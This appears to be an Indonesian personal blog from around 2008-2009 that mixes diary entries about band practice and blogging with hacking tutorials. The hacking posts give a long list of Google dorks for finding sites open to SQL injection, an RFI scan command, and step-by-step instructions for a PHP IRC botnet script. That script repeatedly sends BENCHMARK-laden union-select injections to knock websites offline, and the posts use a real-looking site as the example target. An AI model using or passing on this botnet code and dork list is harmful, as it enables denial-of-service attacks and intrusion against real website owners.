Sabtu 28 Feb 2008

Sabtu ini seperti biasa latian band.duwh,Learning to live (dream theater) nya belon beres,dikit lagi,tinggal kompakin ajha,.maklum lagu ini jarang banget dibawain band lain.hehehe

Balik dari latian nongkrong deh di matahari,untung dapet traktiran temen yang baru jadian,duh rumit banget hari ini...moga-moga besok bisa lanjut deh ke lagu berikutnya.mungkin Underglassmoon atau Take the time

Cape....

Mysql Injection Optimation

Judulnya aga aneh,iyah maksudnya mysql injection bisa dilakukan dengan cara Dork di google,dork adalah pencarian kata kunci yang lebih spesifik di google.beberapa dork sql injection :


inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:event_details.php?event_id=

kalo sudah target ketemu,untuk mempermudah ekstrak database bisa dilakukan jga disini http://akanekun.co.cc/tools/sql/index.html atau pake cara terkenal schemafuzz.namun terkadang google b0t memblock dork,cara mengakali google & schemafuzz akan ditulis lain artikel.hehehe

-Happy Hacking...

Senin 22 Februari 2009

Hari ini ga kemana-mana..tadinya mau nganter kaka yg mu ke berangkat lagi,tapi engga deh,ada janji latian band ama anak-anak,lagian males juga jauh-jauh ke bandara ,mending ikut berangkat.


sial,kalo kaka berangkat pasti repot,ngurus itulah inilah dari mulai ngungsi kamar sampe buka email.haaaa


hari yang membosankan

MIRC part2 (Ddos attack with mysql injection)

Akhirnya nulis lagi neh,part2 dari other side MIRC,kali ini yang mau dibahas serangan denial,oke guys,ga perlu dijelasin apa itu Ddos,atau Sql Injection.!yang jelas efek Ddos yakni si website atau situs akan down (ga bisa dibuka) karna kita ngirim banyak zombie kesana,xD



Yang perlu kamu siapakan :
1.Irc Server
2.Localhost php server
3.Zommbie.php (download disini)


4.sedikit pengetahuan scan b0t dan punya rasa kejam (heheehe)


Okeh cari target yang vuln sql dan tentukan main table nya..input perintah di irc server seperti ini




!ddos[RUN] http://victim.com?index.php?id=1+union+all+select+ddos, 2,3--  -i
REPEATS -t THREADS


misalkan webnya seperti ini :

!ddos[RUN] http://www.newyorkrangers.cz/shownews.php?idn=-1+union+all+select+
1,2,ddos-- -i 5 -t 20


ganti zombie,txt jadi zombie.php,jangan lupadi edit bagian ini

$irc_server = "yourserver"; /ganti dengan server irc elo
$irc_port = "6667"; //ini default port nya
$nick = "NAMAELO-".time(); //Edit namaelo
$reg_con = "$nick "localhost" "$irc_server" :fr0z3n";


okeh jalankan server localhost,jalankan zombie.php di command prompt..lets guys
back to irc server than lakukan command

!ddos[RUN] http://victim.com?index.php?id=1+union+all+select+ddos, 2,3-- -i
REPEATS -t THREADS


buka kembali command prompt seperti itu,load zombie.php berulang - ulang
sampai si website down alias tidak bisa diakses.
load sedikit penjelasan ;

Denial of Service (DoS)
Varian pertama serangan berupa pengiriman air bah data ke target itu
adalah DoS (Denial of Service). Dalam serangan ini penyerang hanya
menggunakan satu komputer untuk menyemburkan data ke korbannya.
Penjelasan sederhananya seperti ini: Suatu ketika handphone anda
berbunyi. Sebelum anda sempat menggangkatnya handphone anda telah
berhenti berbunyi. Tiba-tiba handphone anda berbunyi lagi dan tanpa
sempat anda mengangkatnya, bunyi itupun segera berhenti. Beberapa kali
anda biarkan tapi masalah ini tak kunjung selesai. Beberapa kolega anda
yang hendak menghubungi anda terpaksa tidak bisa melakukannya karena
handphone anda sibuk terus. Itulah gambaran sederhana serangan DoS di
dunia non-cyber.
Di dunia cyber, kasus anda tersebut merupakan serangan salah satu jenis
DOS (Denial of Service). Yang pasti, sebegitu mudahnya DOS ini
diterapkan tapi mencegahnya bukanlah suatu hal yang gampang.
Target-target serangan DOS biasanya adalah server-server ISP, Internet
Banking, E-commerce, Web perusahaan, dan pemerintah.
Serangan DoS dapat dilakukan dengan mengirimkan query sebanyak mungkin
hingga target tidak bisa lagi menanganinya sehingga target lumpuh. Cara
lain melakukan serangan DoS adalah dengan mengirimkan data rusak atau
data yang tidak mampu di tangani oleh server target sehingga server
tersebut menjadi hang (tidak bisa berfungsi sebagaimana mestinya dan
perlu di restart ulang).

DDOS (Distributed Denial of Service)
Mengirimkan data secara terus menerus dengan menggunakan satu komputer
tidak begitu efektif karena biasanya sumber daya server yang diserang
lebih besar dari komputer penyerang. Daya bunuh serangan juga akhirnya
menjadi lemah.
Hacker penyerangpun memutar otaknya. Serangan dapat lebih mematikan
jika tenaga banyak komputer dijadikan satu untuk menciptakan banjir
data yang lebih besar.
Komputer-komputer yang diambil alih oleh hacker tersebut disebut
zombie. Zombie berfungsi sebagai anak buah atau agent penyerang yang
siap beraksi saat mendapat perintah dari “tuannya.”
Semakin banyak zombie yang dkuasai seorang penyerang, semakin
berkuasalah sang hacker tersebut karena besarnya tenaga yang ia
genggam. Dengan tenaga besar yang dikumpulkan dari komputer-komputer
yang dikuasai (secara illegal tentunya) tersebut, serangan DDoS hampir
tidak dapat ditangkal. Karena itulah serangan tipe ini sangat populer
di kalangan hacker.
Beberapa situs raksasa seperti Amazon.com, eBay, dan Yahoo pada
Februari 2000 rontok selama beberapa jam karena serbuan ini. Gedung
Putih juga sempat boyongan karena serangan tipe ini. Gedung Putih
terpaksa “memindahkan” IP address situsnya karena jengah menerima
serangan DDoS yang sudah dirancang untuk muncul pada tanggal dan jam
tertentu dengan memanfaatkan virus tertentu tanpa mampu mencegahnya.
DDoS adalah tipe serangan dengan konsep sederhana.
Namun efeknya bisa memindahkan “istana negara.”


ada pertanyaan?!post comment biar asik ;p
Thanks to frozen and darkc0de crew



Ddos Attack Sql Injection (2nd part MIRC other side)

Ddos attack,beginilah kurang lebih pengertiannya :

Sampai dengan sekarang ini pengertian tentang DDOS adalah seperti yang anda dengarkan beberapa waktu yang lalu mengenai serangan terhadap web site Yahoo! MSN, CNN, Buy.com, eBay dan Amazon.com. Informasi terkini yang didapat kan adalah bahwa serangan hacker itu berasal dari West Coast, United States (Oregon dan California). Dari laporan FBI menuliskan bahwa serangan ini melibatkan beberapa network dari universitas yang ada di daerah tersebut yaitu Stanford, state California dan Santa. Barbara. Pada whitepaper ini akan dibahas sekilas mengenai cara serangan para hacker tersebut ke beberapa web site yang disebutkan di atas




Serangan Denial of Service(DOS) ini terjadi apabila penyerang atau yang sering terdengar dengan istilah hacker ini merusak host atau sevice yang ada sehingga host atau service itu tidak dapat lagi berkomunikasi secara lancar di dalam network neighborhood nya.

Serangan seperti ini juga dapat menghancurkan seluruh host dengan mengakibatkan “kernel panic” pada Linux dan keluarga UNIX lainnya atau lebih umumnya the “blue screen on death” nya Windows NT dan 98.


Serangan DOS ini dapat ditujukan dengan lebih spesifik terhadap services yang ada, contohnya seperti host Web Server dan fungsi dari Network Interface Card (NIC).


Bahkan yang lebih menyenangkan lagi si penyerang menargetkan serangan khusus pada network environment seperti network bandwith dengan menciptakan network request imitasi sehingga terjadi network bussy atau istilah yang lebih familiarnya bottleneck (yang pasti bandwith networknya menjadi full of waste ). Seperti anda ketahui bahwa bandwith adalah bagian yang sangat esensial dari koneksi internet (saluran ke internet). Dengan memenuhi saluran tersebut dengan infomasi sampah(network request imitasi) si penyerang dapat dengan bebas menguasai network bandwith yang masih available. Serangan DOS terakhir yang terjadi adalah pada tgl 7 January 2000.


Serangan DOS ini telah ada pada tahun 1988 yaitu Robert Moris Internet Worm, Melissa virus yang terkenal pada tahun dan masih banyak lagi kejadian DOS pada network dan perusahaan yang tidak diketahui.



Meskipun hal-hal ini disebabkan oleh worm, virusdan beberapa macam dari program yang ada, semua ini terjadi dengan cara yang sama yaitu : satu host menyampaikan informasi atau berkomunikasi dengan host lainnya dan kemudian secara efektif menghancurkan korban dengan mengirim segudang informasi yang tidak dapat di tanggani oleh korban itu sendiri.

okeh ga banyak cincong lagi



Yang perlu disiapin


1.Web target vuln sql


2.Irc Scanb0t


3.php localhost (use apache or xampp)


4.zommbie php that's it :


















/*################################################################
___ __ __ _____ [] __ __ PHP DDOS BOT #######
/ / / / / / / _ / __ / / version: 1.0 ######
/ /__ / /_/ / / /_/ / / / / / author: fr0z3n ######
/______/ /_____/ /_____/ /_/ /_/ _ PHP version req: 5.2.8.8 ######
email: fr0z3n@gmx.de ####
extensions: php_curl.dll ####
############################################################################

#######################
## IRC CONFIGURATION ##
#######################
$irc_server = "yourserver";
$irc_port = "6667";

$channel = "#ddos";
$channel_pass = "ddos";

$nick = "LudiX-".time();
$reg_con = "$nick "localhost" "$irc_server" :fr0z3n";

##########################
## END OF CONFIGURATION ##
##########################

$irc_socket = fsockopen($irc_server, $irc_port);
$dd0s = 0;
$dozzed = 1;
if(!$irc_socket)
{
print "[-] Could not connect to $irc_servern[!] Check your config!";
exit;
}
print "[x] Connected to $irc_servern";

fputs($irc_socket, "USER $reg_conrn");
fputs($irc_socket, "nick $nickrn");

while(!feof($irc_socket))
{
$buffer = fgets($irc_socket);
#print $buffer;
if(preg_match("[^PING (.*)]", $buffer, $analyse))
{
fputs($irc_socket, "PONG $analyse[1]");
}

if(preg_match("[376 $nick :End of /MOTD]", $buffer))
{
print "[x] End of /MOTD command.n[x] Joining $channelrn";
fputs($irc_socket, "join $channel $channel_passn");
}

if(preg_match("[.*PRIVMSG .* :!ddos[RUN] (.*) -i (.*) -t (.*)]", $buffer, $dat))
{
$host = $dat[1];
$x = $dat[2];
$threads = trim($dat[3]);
$host = str_replace("ddos", "BENCHMARK(100000000000,BENCHMARK(999999999999999999999,sha1(1)))", $host);

preg_match("[(http://.*.php).*]", $host, $print);
fputs($irc_socket, "PRIVMSG $channel :STARTING DDOS for $x times with $threads threads [".$print[1]."]rn");
print $host;
$dd0s = 1;
}

if($dozzed == $x)
{
$dd0s = 0;
$dozzed = 1;
$x = 0;
$threads = 1;
fputs($irc_socket, "PRIVMSG $channel :FINISHED DDOSrn");
}

if($dd0s == 1)
{
ddos($host, $threads, $irc_socket, $channel);
++$dozzed;
}

}

function ddos($host, $x, $irc_socket, $channel)
{

$i = 0;
$mh = curl_multi_init();
while($i < $x)
{
$ch[$i] = curl_init();
curl_setopt($ch[$i], CURLOPT_URL, "$host");
curl_setopt($ch[$i], CURLOPT_HEADER, 0);
curl_setopt($ch[$i], CURLOPT_TIMEOUT, 20);
curl_setopt($ch[$i], CURLOPT_MUTE, TRUE);
curl_multi_add_handle($mh,$ch[$i]);
++$i;
}
$running=null;
do {
$eater = curl_multi_exec($mh,$running);
} while($running > 0);

$i = 0;
while($i < $x)
{
curl_multi_remove_handle($mh,$ch[$i]);
++$i;
}
curl_multi_close($mh);
}

?>

Membangun sebuah komunitas anakbogor

Alhamdullilah,sebuah keinginan lama untuk bangun sebuah komunitas maya,akhirnya tercapai juga,sempet dulu bikin komunitas/forum juga,cuman tantangannya kurang,sebab menggunakan free forum di forumotion.com


Apa tujuan membentuk komunitas?!tentunya dengan komunitas kita bisa bersilaturahmi,bertemu orang baru,dan bertukar pikiran.bahkan dunia maya bisa juga digunakan untuk menemukan sahabat lama yang sekian waktu tidak bertemu


http://anakbogor.co.cc/ sebuah komunitas pertama (mungkin) di bogor,mudah2an bisa menjadi komunitas yang berguna buat anak muda bogor.untuk saling sharing dan berbagi baik info dalam bogor maupun luar bogor.


Forum ini berbiaya $0 alias gratis! pertama kali saya menginstall phpbb untuk forum,tapi karna beberapa hal,saya gunakan Vbulletin (gold edition),sekedar info,untuk Vbulletin yang "asli" biayanya adalah $150 /tahun,dan akane buat itu semua dengan free (host,domain,cms).


to be continue




Defacer black and white

Internet security?! hal yang boleh jadi sangat penting dalam dunia cyber,bahwasanya segala bentuk praktik dunia maya sangat dekat dengan security,apakah suatu sistem dikatakan sangat baik,atau bahkan sangat buruk..


Di tahun 90-an seorang maniak komputer (baca:hacker) berhasil menembus jaringan pentagon hanya dengan bermodalkan koneksi dial-up 5kb/s,.dia tidak merusak data,dalam pengakuannya ia hanya melakukan tester security,namun sayang pengadilan memvonisnya bersalah dan harus di hukum.


Pernahkah anda berpikir,bahwa menggunakan satu password untuk berbagai akun anda di internet,adalah hal yang aman?!anda salah.dengan hanya mengetahui email anda saja,sang cracker bisa melakukan berbagai eksploitasi dengan mengambil keuntungan,baik itu credit card,premium akun,dan lain sebagainya.


Hacker?!paradigma masyarakat menandai hacker hanya sebagai perusak sistem,tidak ada hacker yang benar-benar dihargai di Indonesia,salah seorang teman saya merusak sebuah web lokal,dan mengganti halaman depan dengan " HACKED BY .... your security is low and bad" dalam hal ini memang defacer termasuk tindak hacking,namun yang perlu ditekankan tidak semua pelaku hacking dikatagorikan HACKER!


Saya pernah bertanya pada teman saya yang banyak melakukan praktik hacking defacer,"bagaimana caranya mencari solusi atas bugs eksploitasi anda?!" jawaban yang di dapat hanya "null",0mong kosong,orang yang melakyukan deface/merusak web tanpa mengetahui ilmu pastinya /atau hanya mengikuti tutorial step by step adalah LAMER!


LAMER adalah orang yang melakukan sesuatu yang tidak berguna,seperti hacking friendster.Lamer adalah suatu proses yang sagat penting untuk menjadi seorang hacker sejati (baca tingkatan hacker edisi yogyafree).


to be continue


Mirc other side

MIRC atau yang biasa orang gunakan untuk chatting,.mungkin aga kuno yah jaman sekarang (2009) masih menggunakan fasilitas MIRC  :P

Mirc Aplikasi ini banyak dipakai ketika internet mulai booming di negara kita.,hingga perkembangannya MIRC ternyata bisa juga digunakan untuk melakukan praktik hacking hingga  cracking,dan Irc (Mirc) juga banyak digunakan untuk melakukan hash cracking password,.


Tentunya untuk melakukan aksi hacking dengan Mirc dibutuhkan beberapa hal dasar  seperti perintah Linux,dan server irc (biasanya banyak tersedia di milis-milis hacker).misal perintah untuk melakukan scanning remote file inclusion adalah !rfi <dork> <bugs>


Scan mirc sangat cepat sekali,karna b0t melakukan scanning secara global pada semua mesin pencarian,dan akan sangat akurat,sayang para sesepuh jarang sekali berniat melakukan sharing tentang ini,dan saya juga tidak tertarik melakukan b0t scan Mirc karna alasan IP address.dan saya sarankan anda tidak berminat mempelajarinya,karna beberapa resiko yang mungkin akan anda dapatkan.jika anda berniat saya akan post tutorialnya di lain kesempatan :D


bersambung

menjadi blogger: Sepuluh langkah menjadi blogger


menjadi blogger


13 Februari 2008

Hari kemaren tepatnya, saya harus ngulang lagi blogging dari awal,karna kesalahan sistem di Ftp (file transfer protocol).dengan begitu semua post dan comment hilang,.Jadi pelajaran buat saya,bahwa backup database adalah hal yang sangat signifikan menjadi webmaster,hanya sedikit kecerobohan bisa berakibat fatal.


Tidak apa-apa kawan,keep happy terus buat menjadi blogger :)


dan ini yang tersisa dari serpihan blog saya yang hilang :
Artikel ini berasal dari sesepuh blogger indonesia. berikut 10 langkah untuk menjadi bloger sejati. Ingin tahu apa itu?

Ini dia 10 langkah menjadi bloger sejati:

1. Tulis sebuah artikel yang merupakan hasil karya Anda sendiri (bukan copy-paste).
2. Tulis lagi sebuah artikel.
3. Tulis satu lagi.
4. Tambah lagi sebuah artikel.
5. Tambah lagi blog Anda dengan sebuah artikel asli.
6. Tulis satu lagi artikel baru.
7. Tulis satu lagi.
8. Jangan berhenti menulis, tambah 1 artikel lagi.
9. Tambah satu artikel lagi jangan takut salah.
10. Kembali ke langkah 1.

makasih kang,saya mau nyoba blogging lagi..